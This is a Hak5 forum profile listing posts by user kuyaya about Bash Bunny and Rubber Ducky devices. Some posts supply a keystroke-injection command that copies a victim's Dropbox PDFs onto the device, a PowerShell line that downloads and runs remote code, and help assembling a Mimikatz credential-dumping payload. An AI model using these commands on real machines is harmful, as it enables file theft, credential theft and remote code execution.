Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

  • Days Won


Posts posted by kuyaya

  1. 28 minutes ago, Bob123 said:

    I'm sure this has been asked and explained in the past but I just can't find it.  When I plug the bunny in in arming mode, the files I see, where are they located when I SSH in through serial or ethernet?  I cannot find the switch positions through a terminal.  I'm trying to install some python files and pip isn't happy so I want to just drag and drop them somewhere and then see them in the terminal window.  I just don't know how to get to say the loot folder or a switch folder.  I'm not sure where they are hiding.  Any help would be great.  Thanks.

    hey, first you need to mount /dev/nandf to /root/udisk:

    mount -o sync /dev/nandf /root/udisk/

    then you can cd into /root/udisk and you can see the filesystem you usually see when you plug it in during arming mode 👍

  2. On 7/25/2021 at 2:38 AM, WiFiJuice said:

    I'm using a script to exfiltrate PDF-files from Dropbox on macOS. However, I want it to also download the PDFs from the subfolders of the /Dropbox/ directionally. Example from "/Dropbox/Misc/" etc. How do I do that?

    Q STRING scp -r ./Dropbox/*.pdf /Volumes/BashBunny/$lootdir/docs/

    PS: What's your best tip on clearing your tracks after this kind of command in the terminal? 

    This should work (haven't tested it, but it should work)

    Q STRING find ./Dropbox -name '*.pdf' -exec scp '{}' /Volumes/BashBunny/$lootdir/docs/ \;


    • Like 1
  3. Hey Dave-ee, I'd like to correct a small snipped you posted here.

    It's not 

    iex ((New ObjectNet.WebClient).DownloadString($url))

    but rather

    iex (New-Object Net.WebClient).DownloadString($url)

    People may get confused if it doesn't work so I just thought I'll post this here.

  4. 13 hours ago, Luna333 said:

    Can the bash bunny create a 2nd Mouse? Or just mess with the users connected mouse.

    Say i want the bash bunny to go to a curtain point on the screen and keep clicking. How can i do this? Quack only does keyboard haven't seen anything about MOUSE MOVMENTS.

    I need that.


  5. On 3/28/2021 at 11:14 PM, Aaron Outhier said:

    Yeah, I'll say it's not as active! 158 views, but only 1 response. I don't think the site has had 150+ bots/web crawlers in the last month, but less than 10 users. Someone's been looking.

    Don't get me wrong, I'm not getting butt-hurt over it or anything. I realize it would be a boat-load of work for the devs to implement. Would just like some feedback as to whether or not this would be useful to anyone here.

    As for Discord, I read much too slowly... Messages scroll off the screen before I can finish reading them.

    Well, there could also be the possibility that the people simply didn't know what to reply, didn't have time...idk man. It also seems like a really neat idea to me.

    You just seem like a really awesome person and I really recommend Discord if you want to have active responses.


    Messages scroll off the screen before I can finish reading them

    Well, the Hak5 discord server is quite active, but it's really not like there are constantly messages falling in, so you don't have to worry about reading too slow. There are obviously discord servers out there where you can't keep up with reading, but the Hak5 server isn't one of 'em.

    So...yeah. Hope to see you there. Otherwise, I'll stay here aswell obviously, so we'll see each other again anyways.

    • Upvote 1
  6. On 1/5/2021 at 11:22 AM, MetalShadow said:

    Nothing? I can't do anything?
    how do the police get information from a mobile phone or a broken hard drive? 





    A broken harddrive is different from a locked phone, I'd rather compare a locked phone with a locked harddrive (e.g. with bitlocker)

    The police sure can pull the data from the phone, however they probably won't do this with a rubber ducky/bash bunny.

    A harddrive, if protected good enough, is not recoverable (imo).

    • Upvote 1
  7. You cannot do such things with a rubber ducky unless you know the pattern/pin.

    The best thing you can do is:

    1. If you have an android, try using google's phone recovery service. If you logged in with your google account on your android you should be able to recover your files.

    2. If you have an apple phone, try using apple's phone recovery service. If you logged in with your appleID/iCloud on your iOS phone you should be able to recover your files.

    • Upvote 1
  8. Yes, from the BashBunny.

    There is however something called the "twinduck" firmware, which is however not supported or maintained, it's a community project.

    The BashBunny can act as

    1. Mass storage

    2. RNDIS_Ethernet, ECM_Ethernet

    3. HID (keyboard)

    4. Serial

    The RubberDucky only acts as a

    1. HID (keyboard)

    So I'd go for the bunny

  9. 12 hours ago, Lain__D said:

    @kuyaya It's a bit confusing that Hacker warehouse pulled the item too, unless they just magically sold their entire stock in a few days?

    Does the signal owl have cool but dangerous features that they are afraid of "us" finding out about? 

    Uhm, the Hak5 shop stopped selling it like 8 weeks ago. It's not "a few days". It's totally possible that their stock got also sold out after 8 weeks, especially when people realise it's not fabricated anymore.

    I don't think that there are "dangerous hacking features" that they are afraid of "us" finding about. Sounds a bit like a conspiracy theory. I mean, if it had those dangerous features, they could sell more of them, which would make them more money. So I don't think that's the case. Maybe it just wasn't worth it anymore producing it.

  10. 8 hours ago, bjlents said:

    I'll be showing it on a fresh VM yeah, I'm just going to put in some dummy passwords like garfield@gmail.com would be LaZagne for instance. Does Mimikatz give passwords for browsers and things? I thought it was just for grabbing the Windows password.

    Yes it only does output windows passwords. I know that this is not from the browser, but if you have outlook installed (the app) and click on "remember my login", it will get it in plaintext.

    So you could just download the app, set it up for your fake gmail account and it should work.

    Or what would also be interesting, is that you could try to then use Pass the Hash (with the hash you got from Mimikatz) and get remote access with that.

    Does the Mimikatz, which I sent you, work?

  11. Finished with the whole Invoke-Mimikatz payload 🙂

    However, it doesn't save it in a file. It just outputs it to the terminal (powershell). It wouldn't be hard to save it to a file, if you want it that way.

    Update: It does now save it to a file :).

    • Like 1
  12. 3 hours ago, bjlents said:

    No I've not edited anything. I've been trying to dissect the payloads (SMBruteBunny and Garfield) to figure out how I'd combine them but haven't gotten far. The other road block I had was banging my head on the wall after starting the thread because I forgot to disable Defender Firewall which prevented SMBruteBunny from bruteforcing the password.


    I still haven't figured out what is causing Garfield to not see the passwords in Firefox (or anything else)

    Okay, so the problem is that LaZagne gets removed by Windows Defender (even if you set exclusions) which pretty much screwed up most of my work on the payload. Maybe the same happens to Garfield, idk.

    So I assume an Invoke-Mimikatz is also fine?

    If you have a presentation and you could show it type crypto-stuff and then output mimikatz, that'd be even cooler, right?

    I'm just gonna work ~15min on the Invoke-Mimikatz one and then send it to you. Of course with the SMBBruteBunny included.

    Another question: are you gonna show it on a fresh Windows 10 VM with just some passwords on it?

    • Like 1
  13. On 11/29/2020 at 3:41 PM, Ryan_J said:


    You could easily achieve this by using Macdroid on your phone.I’m assuming it must be an android device. You could create a macro that would instruct your phone to play a sound (ringtone) when connected to a specific Wi-Fi network. 


    Hm okay, so I've tried to think of a way to achieve this without having to install the app.

    I thought about a captiveportal which uses javascript to vibrate the phone. However, that's only going to work if the user opens the phone and then the captive portal pops up.

    Does anyone maybe have an idea?

  • Create New...